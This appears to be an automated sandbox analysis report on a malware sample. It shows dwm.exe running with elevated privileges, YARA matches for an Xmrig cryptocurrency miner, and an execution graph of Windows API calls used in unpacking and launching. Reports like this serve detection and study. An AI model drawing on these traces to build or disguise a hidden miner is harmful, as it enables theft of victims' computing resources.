                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:68
                                            Start time:09:44:59
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\dwm.exe
                                            Wow64 process (32bit):false
                                            Commandline:dwm.exe
                                            Imagebase:0x7ff74e710000
                                            File size:94'720 bytes
                                            MD5 hash:5C27608411832C5B39BA04E33D53536C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000002.2958991562.000001F3D6BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000003.2855013595.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000002.2958991562.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000002.2958991562.000001F3D6B89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000044.00000002.2958991562.000001F3D6C5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:9.2%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:22.3%
                                              Total number of Nodes:1656
                                              Total number of Limit Nodes:44
                                              execution_graph 24661 630782 24662 630686 24661->24662 24664 630d3a 24662->24664 24690 630a98 24664->24690 24666 630d4a 24667 630da7 24666->24667 24678 630dcb 24666->24678 24668 630cd8 DloadReleaseSectionWriteAccess 6 API calls 24667->24668 24669 630db2 RaiseException 24668->24669 24686 630fa0 24669->24686 24670 630e43 LoadLibraryExA 24671 630e56 GetLastError 24670->24671 24672 630ea4 24670->24672 24673 630e69 24671->24673 24674 630e7f 24671->24674 24676 630eb6 24672->24676 24677 630eaf FreeLibrary 24672->24677 24673->24672 24673->24674 24679 630cd8 DloadReleaseSectionWriteAccess 6 API calls 24674->24679 24675 630f14 GetProcAddress 24680 630f24 GetLastError 24675->24680 24685 630f72 24675->24685 24676->24675 24676->24685 24677->24676 24678->24670 24678->24672 24678->24676 24678->24685 24681 630e8a RaiseException 24679->24681 24682 630f37 24680->24682 24681->24686 24684 630cd8 DloadReleaseSectionWriteAccess 6 API calls 24682->24684 24682->24685 24687 630f58 RaiseException 24684->24687 24699 630cd8 24685->24699 24686->24662 24688 630a98 ___delayLoadHelper2@8 6 API calls 24687->24688 24689 630f6f 24688->24689 24689->24685 24691 630aa4 24690->24691 24692 630aca 24690->24692 24707 630b41 24691->24707 24692->24666 24694 630aa9 24695 630ac5 24694->24695 24710 630c6a 24694->24710 24715 630acb GetModuleHandleW GetProcAddress GetProcAddress 24695->24715 24698 630d13 24698->24666 24700 630cea 24699->24700 24701 630d0c 24699->24701 24702 630b41 DloadReleaseSectionWriteAccess 3 API calls 24700->24702 24701->24686 24703 630cef 24702->24703 24704 630d07 24703->24704 24705 630c6a DloadProtectSection 3 API calls 24703->24705 24718 630d0e GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24704->24718 24705->24704 24716 630acb GetModuleHandleW GetProcAddress GetProcAddress 24707->24716 24709 630b46 24709->24694 24712 630c7f DloadProtectSection 24710->24712 24711 630cba VirtualProtect 24713 630c85 24711->24713 24712->24711 24712->24713 24717 630b80 VirtualQuery GetSystemInfo 24712->24717 24713->24695 24715->24698 24716->24709 24717->24711 24718->24701 24719 62dae0 24720 62daf2 24719->24720 24891 611366 24720->24891 24723 62e250 25009 62f9ee 24723->25009 24724 62db5c 24729 62dbd0 24724->24729 24730 62db6d 24724->24730 24735 62db76 24724->24735 24728 62e555 24733 62dc63 GetDlgItemTextW 24729->24733 24738 62dbe6 24729->24738 24730->24735 24742 620597 53 API calls 24730->24742 24731 62e26b SendMessageW 24732 62e279 24731->24732 24736 62e282 SendDlgItemMessageW 24732->24736 24737 62e293 GetDlgItem SendMessageW 24732->24737 24734 62dca0 24733->24734 24733->24735 24740 62dcb5 GetDlgItem 24734->24740 24755 62dca9 24734->24755 25064 6310f9 24735->25064 24736->24737 25028 62c5dd GetCurrentDirectoryW 24737->25028 24741 620597 53 API calls 24738->24741 24745 62dcc9 SendMessageW SendMessageW 24740->24745 24746 62dcec SetFocus 24740->24746 24744 62dc03 SetDlgItemTextW 24741->24744 24747 62db90 24742->24747 24743 62e2c3 GetDlgItem 24749 62e2e0 24743->24749 24750 62e2e6 SetWindowTextW 24743->24750 24751 62dc0e 24744->24751 24745->24746 24752 62dd08 24746->24752 24753 62dcfc 24746->24753 25052 611273 6 API calls CatchGuardHandler 24747->25052 24749->24750 25029 62cb49 GetClassNameW 24750->25029 24751->24735 24760 62dc1b GetMessageW 24751->24760 24770 620597 53 API calls 24752->24770 24757 620597 53 API calls 24753->24757 24754 62db97 24754->24735 24762 62e531 SetDlgItemTextW 24754->24762 24755->24735 24758 620597 53 API calls 24755->24758 24761 62dd06 24757->24761 24763 62e1a6 SetDlgItemTextW 24758->24763 24760->24735 24765 62dc32 IsDialogMessageW 24760->24765 24901 62f7fc 24761->24901 24762->24735 24767 62e1ba 24763->24767 24765->24751 24769 62dc41 TranslateMessage DispatchMessageW 24765->24769 24775 620597 53 API calls 24767->24775 24769->24751 24773 62dd3f 24770->24773 24772 62e331 24777 62e361 24772->24777 24782 620597 53 API calls 24772->24782 24778 614c00 _swprintf 51 API calls 24773->24778 24774 62dd77 24780 62dd96 24774->24780 24913 61bccb 24774->24913 24807 62e1dd _wcslen 24775->24807 24776 62ea07 120 API calls 24776->24772 24787 62ea07 120 API calls 24777->24787 24841 62e419 24777->24841 24778->24761 24928 61baf1 24780->24928 24785 62e344 SetDlgItemTextW 24782->24785 24792 620597 53 API calls 24785->24792 24795 62e37c 24787->24795 24788 62e4c0 24789 62e4d2 24788->24789 24790 62e4c9 EnableWindow 24788->24790 24796 62e4ef 24789->24796 25062 611323 GetDlgItem KiUserCallbackDispatcher 24789->25062 24790->24789 24791 62e22e 24799 620597 53 API calls 24791->24799 24798 62e358 SetDlgItemTextW 24792->24798 24793 62ddba 24939 62cbb6 SetCurrentDirectoryW 24793->24939 24794 62ddaf GetLastError 24794->24793 24805 62e38e 24795->24805 24826 62e3b3 24795->24826 24803 62e516 24796->24803 24815 62e50e SendMessageW 24796->24815 24798->24777 24799->24735 24801 62e40c 24808 62ea07 120 API calls 24801->24808 24803->24735 24816 620597 53 API calls 24803->24816 24804 62ddce 24809 62ddd7 GetLastError 24804->24809 24810 62dde5 24804->24810 25060 62be55 31 API calls CatchGuardHandler 24805->25060 24806 62e4e5 25063 611323 GetDlgItem KiUserCallbackDispatcher 24806->25063 24807->24791 24814 620597 53 API calls 24807->24814 24808->24841 24809->24810 24812 62de5c 24810->24812 24818 62de6b 24810->24818 24819 62ddf5 GetTickCount 24810->24819 24812->24818 24822 62e097 24812->24822 24820 62e211 24814->24820 24815->24803 24816->24754 24817 62e3a7 24817->24826 24823 62e032 24818->24823 24824 62de84 GetModuleFileNameW 24818->24824 24830 62e03c 24818->24830 24940 614c00 24819->24940 24827 614c00 _swprintf 51 API calls 24820->24827 24821 62e4a1 25061 62be55 31 API calls CatchGuardHandler 24821->25061 24960 611341 GetDlgItem ShowWindow 24822->24960 24823->24735 24823->24830 25054 6212bc 82 API calls 24824->25054 24826->24801 24836 62ea07 120 API calls 24826->24836 24827->24791 24835 620597 53 API calls 24830->24835 24831 62de12 24943 61b01e 24831->24943 24832 620597 53 API calls 24832->24841 24833 62e4bd 24833->24788 24839 62e046 24835->24839 24840 62e3e1 24836->24840 24837 62e0a7 24961 611341 GetDlgItem ShowWindow 24837->24961 24838 62deac 24844 614c00 _swprintf 51 API calls 24838->24844 24845 614c00 _swprintf 51 API calls 24839->24845 24840->24801 24846 62e3ea DialogBoxParamW 24840->24846 24841->24788 24841->24821 24841->24832 24843 62e0b1 24962 620597 24843->24962 24848 62dece CreateFileMappingW 24844->24848 24849 62e064 24845->24849 24846->24735 24846->24801 24853 62df2c GetCommandLineW 24848->24853 24885 62dfa3 __InternalCxxFrameHandler 24848->24885 24861 620597 53 API calls 24849->24861 24856 62df3d 24853->24856 24855 62dfae ShellExecuteExW 24870 62dfc9 24855->24870 25055 62d705 SHGetMalloc 24856->25055 24857 62de3f GetLastError 24858 62de4a 24857->24858 24953 61af2f 24858->24953 24859 62e0cd SetDlgItemTextW GetDlgItem 24863 62e102 24859->24863 24864 62e0ea GetWindowLongW SetWindowLongW 24859->24864 24865 62e07e 24861->24865 24967 62ea07 24863->24967 24864->24863 24866 62df59 25056 62d705 SHGetMalloc 24866->25056 24869 62e110 24872 62ea07 120 API calls 24869->24872 24873 62e00c 24870->24873 24874 62dfde WaitForInputIdle 24870->24874 24871 62df65 25057 62d705 SHGetMalloc 24871->25057 24876 62e11e 24872->24876 24873->24823 24881 62e022 UnmapViewOfFile CloseHandle 24873->24881 24877 62dff3 24874->24877 24997 62fdf7 24876->24997 24877->24873 24880 62dff8 Sleep 24877->24880 24878 62df71 25058 62136b 82 API calls 24878->25058 24880->24873 24880->24877 24881->24823 24883 62df82 MapViewOfFile 24883->24885 24885->24855 24892 6113c8 24891->24892 24893 61136f 24891->24893 25072 62021d GetWindowLongW SetWindowLongW 24892->25072 24895 6113d5 24893->24895 25071 620244 62 API calls 3 library calls 24893->25071 24895->24723 24895->24724 24895->24735 24897 611391 24897->24895 24898 6113a4 GetDlgItem 24897->24898 24898->24895 24899 6113b4 24898->24899 24899->24895 24900 6113ba SetWindowTextW 24899->24900 24900->24895 25073 62d864 PeekMessageW 24901->25073 24904 62f836 24908 62f841 ShowWindow SendMessageW SendMessageW 24904->24908 24905 62f86e SendMessageW SendMessageW 24906 62f8ae 24905->24906 24907 62f8cd SendMessageW SendMessageW SendMessageW 24905->24907 24906->24907 24909 62f901 SendMessageW 24907->24909 24910 62f924 SendMessageW 24907->24910 24908->24905 24909->24910 24911 6310f9 CatchGuardHandler 5 API calls 24910->24911 24912 62dd62 24911->24912 24912->24774 25053 62ff24 5 API calls 2 library calls 24912->25053 25078 61bcdd 24913->25078 24916 62cebf 25096 62d392 GetCurrentProcess OpenProcessToken 24916->25096 24918 62cee1 24919 62cf75 24918->24919 24920 62cee9 SetEntriesInAclW 24918->24920 24922 6310f9 CatchGuardHandler 5 API calls 24919->24922 24920->24919 24921 62cf2a InitializeSecurityDescriptor 24920->24921 24924 62cf67 24921->24924 24925 62cf39 SetSecurityDescriptorDacl 24921->24925 24923 62cf82 24922->24923 24923->24780 24924->24919 24927 62cf6c LocalFree 24924->24927 24925->24924 24926 62cf4c CreateDirectoryW 24925->24926 24926->24924 24927->24919 24933 61bafb 24928->24933 24929 6310f9 CatchGuardHandler 5 API calls 24930 61bbf0 24929->24930 24930->24793 24930->24794 24931 61bba8 24932 61bee1 13 API calls 24931->24932 24934 61bbd0 24931->24934 24932->24934 24933->24931 24933->24934 24935 61bbf9 24933->24935 25103 61bee1 24933->25103 24934->24929 25118 6313f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 24935->25118 24938 61bbfe 24939->24804 25129 614bd3 24940->25129 24944 61b028 24943->24944 24945 61b096 CreateFileW 24944->24945 24946 61b08d 24944->24946 24945->24946 24947 61b0dd 24946->24947 24948 61da1e 6 API calls 24946->24948 24950 6310f9 CatchGuardHandler 5 API calls 24947->24950 24949 61b0c2 24948->24949 24949->24947 24951 61b0c6 CreateFileW 24949->24951 24952 61b111 24950->24952 24951->24947 24952->24857 24952->24858 24954 61af6e 24953->24954 24955 61af5d 24953->24955 24954->24812 24955->24954 24956 61af70 24955->24956 24957 61af69 24955->24957 25213 61afd0 24956->25213 25208 61b11a 24957->25208 24960->24837 24961->24843 24963 6205a7 24962->24963 25230 6205c8 24963->25230 24966 611341 GetDlgItem ShowWindow 24966->24859 24968 62ea19 24967->24968 24969 62f717 24968->24969 25257 62d5dd 6 API calls CatchGuardHandler 24968->25257 24970 6310f9 CatchGuardHandler 5 API calls 24969->24970 24972 62f732 24970->24972 24972->24869 25282 6313f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 24972->25282 24974 62f741 24976 62ed57 SetWindowTextW 24984 62ea7c _wcslen _wcsrchr 24976->24984 24982 62eb65 _abort _wcslen 24982->24984 24985 62ec05 GetFileAttributesW 24982->24985 24994 62ef75 SendMessageW 24982->24994 25263 61d8ac 51 API calls 2 library calls 24982->25263 25280 62d41c 99 API calls CatchGuardHandler 24982->25280 24983 62eb4b SetFileAttributesW 24983->24982 24983->24985 24984->24969 24984->24972 24984->24976 24984->24982 24984->24983 25258 62c5dd GetCurrentDirectoryW 24984->25258 25259 61dd18 24984->25259 25264 61c3de 11 API calls 24984->25264 25265 61c367 FindClose 24984->25265 25266 62d76e 76 API calls 3 library calls 24984->25266 25267 6366ae 24984->25267 25281 62d5dd 6 API calls CatchGuardHandler 24984->25281 24985->24984 24988 62ec17 DeleteFileW 24985->24988 24988->24984 24990 62ec28 24988->24990 24992 614c00 _swprintf 51 API calls 24990->24992 24991 62ef35 GetDlgItem SetWindowTextW SendMessageW 24991->24982 24993 62ec48 GetFileAttributesW 24992->24993 24993->24990 24995 62ec5d MoveFileW 24993->24995 24994->24984 24995->24984 24996 62ec75 MoveFileExW 24995->24996 24996->24984 24998 62fe13 24997->24998 25294 6226df 24998->25294 25000 62fe59 25298 618ddf 25000->25298 25002 62feb7 25308 618ff5 25002->25308 25010 62f9f8 25009->25010 25878 62c556 25010->25878 25013 62fae1 25015 6310f9 CatchGuardHandler 5 API calls 25013->25015 25014 62fa1b GetWindow 25014->25013 25018 62fa34 25014->25018 25016 62e256 25015->25016 25016->24731 25016->24732 25017 62fa41 GetClassNameW 25017->25018 25018->25013 25018->25017 25019 62fa65 GetWindowLongW 25018->25019 25020 62fac9 GetWindow 25018->25020 25019->25020 25021 62fa75 SendMessageW 25019->25021 25020->25013 25020->25018 25021->25020 25022 62fa8b GetObjectW 25021->25022 25883 62c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25022->25883 25024 62faa2 25884 62c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25024->25884 25885 62c79c 12 API calls CatchGuardHandler 25024->25885 25027 62fab3 SendMessageW 25027->25020 25028->24743 25030 62cb74 25029->25030 25031 62cb99 25029->25031 25030->25031 25035 62cb8b FindWindowExW 25030->25035 25032 62cba7 25031->25032 25033 62cb9e SHAutoComplete 25031->25033 25034 6310f9 CatchGuardHandler 5 API calls 25032->25034 25033->25032 25036 62cbb2 25034->25036 25035->25031 25037 62d243 25036->25037 25038 62d255 25037->25038 25039 61147c 43 API calls 25038->25039 25040 62d2af 25039->25040 25888 6120eb 25040->25888 25043 62d2d1 25895 611b0e 25043->25895 25044 62d2c5 25045 6116b8 86 API calls 25044->25045 25047 62d2cd 25045->25047 25048 6310f9 CatchGuardHandler 5 API calls 25047->25048 25050 62d357 25048->25050 25049 62d2ed __InternalCxxFrameHandler ___std_exception_copy 25051 6116b8 86 API calls 25049->25051 25050->24772 25050->24776 25051->25047 25052->24754 25053->24774 25054->24838 25055->24866 25056->24871 25057->24878 25058->24883 25060->24817 25061->24833 25062->24806 25063->24796 25065 631102 IsProcessorFeaturePresent 25064->25065 25066 631101 25064->25066 25068 631314 25065->25068 25066->24728 25976 6312d7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25068->25976 25070 6313f7 25070->24728 25071->24897 25072->24895 25074 62d8b8 GetDlgItem 25073->25074 25075 62d87f GetMessageW 25073->25075 25074->24904 25074->24905 25076 62d8a4 TranslateMessage DispatchMessageW 25075->25076 25077 62d895 IsDialogMessageW 25075->25077 25076->25074 25077->25074 25077->25076 25088 631590 25078->25088 25081 61bd07 25090 61da1e 25081->25090 25082 61bd2c 25084 6310f9 CatchGuardHandler 5 API calls 25082->25084 25086 61bcd4 25084->25086 25086->24780 25086->24916 25087 61bd1d GetFileAttributesW 25087->25082 25089 61bcea GetFileAttributesW 25088->25089 25089->25081 25089->25082 25093 61da28 _wcslen 25090->25093 25091 6310f9 CatchGuardHandler 5 API calls 25092 61bd19 25091->25092 25092->25082 25092->25087 25094 61daf7 GetCurrentDirectoryW 25093->25094 25095 61da6f _wcslen 25093->25095 25094->25095 25095->25091 25097 62d3b2 GetTokenInformation 25096->25097 25102 62d409 25096->25102 25098 62d3d7 ___std_exception_copy 25097->25098 25099 62d3cc GetLastError 25097->25099 25100 62d3e0 GetTokenInformation 25098->25100 25099->25098 25099->25102 25101 62d3fa CopySid 25100->25101 25100->25102 25101->25102 25102->24918 25104 61beee 25103->25104 25105 61bf1c 25104->25105 25106 61bf0f CreateDirectoryW 25104->25106 25107 61bccb 8 API calls 25105->25107 25106->25105 25108 61bf4f 25106->25108 25109 61bf22 25107->25109 25111 61bf5e 25108->25111 25119 61c2e5 25108->25119 25110 61bf62 GetLastError 25109->25110 25112 61da1e 6 API calls 25109->25112 25110->25111 25114 6310f9 CatchGuardHandler 5 API calls 25111->25114 25115 61bf38 25112->25115 25116 61bf85 25114->25116 25115->25110 25117 61bf3c CreateDirectoryW 25115->25117 25116->24933 25117->25108 25117->25110 25118->24938 25120 631590 25119->25120 25121 61c2f2 SetFileAttributesW 25120->25121 25122 61c314 25121->25122 25123 61c33f 25121->25123 25125 61da1e 6 API calls 25122->25125 25124 6310f9 CatchGuardHandler 5 API calls 25123->25124 25126 61c34d 25124->25126 25127 61c326 25125->25127 25126->25111 25127->25123 25128 61c32a SetFileAttributesW 25127->25128 25128->25123 25130 614bea __vswprintf_c_l 25129->25130 25133 638772 25130->25133 25136 636835 25133->25136 25137 636875 25136->25137 25138 63685d 25136->25138 25137->25138 25140 63687d 25137->25140 25153 63bc7b 20 API calls _abort 25138->25153 25155 636dd4 25140->25155 25142 636862 25154 636649 26 API calls _abort 25142->25154 25145 63686d 25147 6310f9 CatchGuardHandler 5 API calls 25145->25147 25149 614bf4 25147->25149 25148 636905 25164 637184 51 API calls 4 library calls 25148->25164 25149->24831 25152 636910 25165 636e57 20 API calls _free 25152->25165 25153->25142 25154->25145 25156 636df1 25155->25156 25157 63688d 25155->25157 25156->25157 25166 63b9a5 GetLastError 25156->25166 25163 636d9f 20 API calls 2 library calls 25157->25163 25159 636e12 25186 63bf86 38 API calls __fassign 25159->25186 25161 636e2b 25187 63bfb3 38 API calls __fassign 25161->25187 25163->25148 25164->25152 25165->25145 25167 63b9c1 25166->25167 25168 63b9bb 25166->25168 25172 63ba10 SetLastError 25167->25172 25189 63d786 25167->25189 25188 63d4ab 11 API calls 2 library calls 25168->25188 25172->25159 25173 63b9db 25196 63bafa 25173->25196 25175 63b9f0 25175->25173 25177 63b9f7 25175->25177 25203 63b810 20 API calls _abort 25177->25203 25178 63b9e1 25179 63ba1c SetLastError 25178->25179 25204 63b584 38 API calls _abort 25179->25204 25181 63ba02 25183 63bafa _free 20 API calls 25181->25183 25185 63ba09 25183->25185 25185->25172 25185->25179 25186->25161 25187->25157 25188->25167 25194 63d793 _abort 25189->25194 25190 63d7d3 25206 63bc7b 20 API calls _abort 25190->25206 25191 63d7be RtlAllocateHeap 25192 63b9d3 25191->25192 25191->25194 25192->25173 25202 63d501 11 API calls 2 library calls 25192->25202 25194->25190 25194->25191 25205 63a2ec 7 API calls 2 library calls 25194->25205 25197 63bb05 RtlFreeHeap 25196->25197 25201 63bb2e __dosmaperr 25196->25201 25198 63bb1a 25197->25198 25197->25201 25207 63bc7b 20 API calls _abort 25198->25207 25200 63bb20 GetLastError 25200->25201 25201->25178 25202->25175 25203->25181 25205->25194 25206->25192 25207->25200 25209 61b123 25208->25209 25210 61b14d 25208->25210 25209->25210 25219 61bc65 25209->25219 25210->24954 25214 61afdc 25213->25214 25215 61affa 25213->25215 25214->25215 25217 61afe8 FindCloseChangeNotification 25214->25217 25216 61b019 25215->25216 25229 617b49 76 API calls 25215->25229 25216->24954 25217->25215 25220 631590 25219->25220 25221 61bc72 DeleteFileW 25220->25221 25222 61bc91 25221->25222 25223 61bcb9 25221->25223 25224 61da1e 6 API calls 25222->25224 25225 6310f9 CatchGuardHandler 5 API calls 25223->25225 25226 61bca3 25224->25226 25227 61b14b 25225->25227 25226->25223 25228 61bca7 DeleteFileW 25226->25228 25227->24954 25228->25223 25229->25216 25236 61f892 25230->25236 25233 6205c5 SetDlgItemTextW 25233->24966 25234 6205eb LoadStringW 25234->25233 25235 620602 LoadStringW 25234->25235 25235->25233 25243 61f7b8 25236->25243 25239 61f8d3 25241 6310f9 CatchGuardHandler 5 API calls 25239->25241 25242 61f8e8 25241->25242 25242->25233 25242->25234 25244 61f7e1 25243->25244 25252 61f85d _strncpy 25243->25252 25248 61f801 25244->25248 25254 623f47 WideCharToMultiByte 25244->25254 25246 6310f9 CatchGuardHandler 5 API calls 25247 61f88b 25246->25247 25247->25239 25253 61f8ec 26 API calls 25247->25253 25251 61f832 25248->25251 25255 620531 50 API calls __vsnprintf 25248->25255 25256 638a01 26 API calls 3 library calls 25251->25256 25252->25246 25253->25239 25254->25248 25255->25251 25256->25252 25257->24984 25258->24984 25260 61dd22 25259->25260 25261 6310f9 CatchGuardHandler 5 API calls 25260->25261 25262 61dda6 25261->25262 25262->24984 25263->24982 25264->24984 25265->24984 25266->24984 25268 63bb34 25267->25268 25269 63bb41 25268->25269 25270 63bb4c 25268->25270 25283 63bc8e 25269->25283 25272 63bb54 25270->25272 25278 63bb5d _abort 25270->25278 25273 63bafa _free 20 API calls 25272->25273 25276 63bb49 25273->25276 25274 63bb62 25290 63bc7b 20 API calls _abort 25274->25290 25275 63bb87 HeapReAlloc 25275->25276 25275->25278 25276->24984 25278->25274 25278->25275 25291 63a2ec 7 API calls 2 library calls 25278->25291 25280->24991 25281->24984 25282->24974 25284 63bccc 25283->25284 25288 63bc9c _abort 25283->25288 25293 63bc7b 20 API calls _abort 25284->25293 25285 63bcb7 RtlAllocateHeap 25287 63bcca 25285->25287 25285->25288 25287->25276 25288->25284 25288->25285 25292 63a2ec 7 API calls 2 library calls 25288->25292 25290->25276 25291->25278 25292->25288 25293->25287 25295 6226ec _wcslen 25294->25295 25327 611925 25295->25327 25297 622704 25297->25000 25299 618deb __EH_prolog3 25298->25299 25340 61ee0f 25299->25340 25301 618e0e 25346 63121c 25301->25346 25303 618e52 _abort 25304 63121c 27 API calls 25303->25304 25305 618e7a 25304->25305 25359 626b0d 25305->25359 25307 618eac 25307->25002 25309 618fff 25308->25309 25310 619080 25309->25310 25393 61c37a 25309->25393 25314 6190e5 25310->25314 25370 6196b9 25310->25370 25312 619127 25313 6310f9 CatchGuardHandler 5 API calls 25312->25313 25316 61914e 25313->25316 25314->25312 25399 611407 74 API calls CatchGuardHandler 25314->25399 25318 618ebb 25316->25318 25866 61ab26 25318->25866 25320 618ee6 25322 618ef7 Concurrency::cancel_current_task 25320->25322 25870 624396 25320->25870 25323 612179 26 API calls 25322->25323 25324 618f1e 25323->25324 25876 61eea4 86 API calls Concurrency::cancel_current_task 25324->25876 25328 611937 25327->25328 25335 61198f 25327->25335 25329 611960 25328->25329 25337 617bad 76 API calls 2 library calls 25328->25337 25331 6366ae 22 API calls 25329->25331 25333 611980 25331->25333 25332 611956 25338 617c32 75 API calls 25332->25338 25333->25335 25339 617c32 75 API calls 25333->25339 25335->25297 25337->25332 25338->25329 25339->25335 25341 61ee1b __EH_prolog3 25340->25341 25342 63121c 27 API calls 25341->25342 25343 61ee59 25342->25343 25344 63121c 27 API calls 25343->25344 25345 61ee7d 25344->25345 25345->25301 25347 631221 ___std_exception_copy 25346->25347 25348 63123b 25347->25348 25350 63123d 25347->25350 25367 63a2ec 7 API calls 2 library calls 25347->25367 25348->25303 25351 614adb Concurrency::cancel_current_task 25350->25351 25353 631247 25350->25353 25365 6347d0 RaiseException 25351->25365 25368 6347d0 RaiseException 25353->25368 25354 614af7 25356 614b0d 25354->25356 25366 6113db 26 API calls Concurrency::cancel_current_task 25354->25366 25356->25303 25357 631de0 25360 626b19 __EH_prolog3 25359->25360 25361 63121c 27 API calls 25360->25361 25362 626b33 25361->25362 25364 626b4a 25362->25364 25369 622f22 80 API calls 25362->25369 25364->25307 25365->25354 25366->25356 25367->25347 25368->25357 25369->25364 25371 6196d4 25370->25371 25400 61147c 25371->25400 25373 6196fb 25374 61970c 25373->25374 25555 61b982 25373->25555 25378 619743 25374->25378 25410 611b63 25374->25410 25377 61973f 25377->25378 25429 6120a1 144 API calls __EH_prolog3 25377->25429 25559 6116b8 25378->25559 25384 6197e4 25430 61988e 81 API calls 25384->25430 25386 61976b 25386->25384 25392 61c37a 12 API calls 25386->25392 25387 619842 25387->25378 25434 61441e 25387->25434 25446 619906 25387->25446 25388 6197fe 25388->25387 25431 623cf2 25388->25431 25392->25386 25394 61c38f 25393->25394 25395 61c3bd 25394->25395 25853 61c4a8 25394->25853 25395->25309 25398 61c3a4 FindClose 25398->25395 25399->25312 25401 611488 __EH_prolog3 25400->25401 25402 61ee0f 27 API calls 25401->25402 25403 6114b7 25402->25403 25404 63121c 27 API calls 25403->25404 25407 61152b 25403->25407 25406 611518 25404->25406 25406->25407 25567 61668f 25406->25567 25575 61cc45 25407->25575 25409 6115b3 _abort 25409->25373 25411 611b6f __EH_prolog3 25410->25411 25423 611bbc 25411->25423 25426 611cef 25411->25426 25602 61145d 25411->25602 25414 611d21 25614 611407 74 API calls CatchGuardHandler 25414->25614 25416 61441e 118 API calls 25420 611d6c 25416->25420 25417 611d2e 25417->25416 25417->25426 25418 611db4 25422 611de7 25418->25422 25418->25426 25615 611407 74 API calls CatchGuardHandler 25418->25615 25420->25418 25421 61441e 118 API calls 25420->25421 25421->25420 25422->25426 25428 61b8c0 79 API calls 25422->25428 25423->25414 25423->25417 25423->25426 25424 61441e 118 API calls 25425 611e38 25424->25425 25425->25424 25425->25426 25426->25377 25428->25425 25429->25386 25430->25388 25631 63029f 25431->25631 25435 61442a 25434->25435 25436 61442e 25434->25436 25435->25387 25445 61b8c0 79 API calls 25436->25445 25437 614440 25438 614469 25437->25438 25439 61445b 25437->25439 25641 612fcb 25438->25641 25440 61449b 25439->25440 25687 613ab7 105 API calls 3 library calls 25439->25687 25440->25387 25443 614467 25443->25440 25688 6125f4 74 API calls 25443->25688 25445->25437 25447 619918 25446->25447 25451 61997a 25447->25451 25469 619da2 Concurrency::cancel_current_task 25447->25469 25776 62ab94 119 API calls CatchGuardHandler 25447->25776 25449 61a820 25452 61a825 25449->25452 25453 61a86c 25449->25453 25450 6310f9 CatchGuardHandler 5 API calls 25454 61a862 25450->25454 25451->25449 25457 61999b 25451->25457 25451->25469 25452->25469 25826 618c06 169 API calls 25452->25826 25453->25469 25827 62ab94 119 API calls CatchGuardHandler 25453->25827 25454->25387 25457->25469 25750 616936 25457->25750 25459 619a71 25756 61d63a 25459->25756 25461 619bba 25465 619ce2 25461->25465 25461->25469 25779 619582 38 API calls 25461->25779 25463 619aa4 25463->25461 25777 61bf89 57 API calls 4 library calls 25463->25777 25470 61c37a 12 API calls 25465->25470 25474 619d40 25465->25474 25468 619c24 25778 639ea8 26 API calls 2 library calls 25468->25778 25469->25450 25470->25474 25472 61a0ac 25788 61f014 97 API calls 25472->25788 25760 618f84 25474->25760 25476 619dd1 25495 619e33 25476->25495 25780 614916 27 API calls 2 library calls 25476->25780 25480 61a0c3 25483 61a118 25480->25483 25498 61a0ce 25480->25498 25481 61a004 25481->25480 25487 61a033 25481->25487 25490 61a09b 25483->25490 25790 6193ac 119 API calls CatchGuardHandler 25483->25790 25484 61a7d9 25488 61af2f 80 API calls 25484->25488 25485 61a174 25485->25484 25510 61a1e2 25485->25510 25791 61b288 25485->25791 25486 61a116 25491 61af2f 80 API calls 25486->25491 25487->25485 25487->25490 25492 61bccb 8 API calls 25487->25492 25488->25469 25490->25485 25490->25486 25491->25469 25493 61a068 25492->25493 25493->25490 25787 61ac09 97 API calls 25493->25787 25494 619f71 25785 61240a 74 API calls CatchGuardHandler 25494->25785 25495->25469 25495->25494 25504 619f78 Concurrency::cancel_current_task 25495->25504 25781 618db7 41 API calls 25495->25781 25782 61f014 97 API calls 25495->25782 25783 61240a 74 API calls CatchGuardHandler 25495->25783 25784 61953f 99 API calls 25495->25784 25498->25486 25789 619155 123 API calls CatchGuardHandler 25498->25789 25501 61a231 25506 61c94d 27 API calls 25501->25506 25504->25481 25786 61bd61 50 API calls 3 library calls 25504->25786 25521 61a247 25506->25521 25508 61a1d0 25795 617e45 77 API calls 25508->25795 25766 61c94d 25510->25766 25511 61a511 25515 61a523 25511->25515 25516 61a537 25511->25516 25536 61a3b5 25511->25536 25512 61a37c 25514 61a43c 25512->25514 25517 61a394 25512->25517 25513 61a31d 25513->25511 25513->25512 25524 61d63a 5 API calls 25514->25524 25808 61ab81 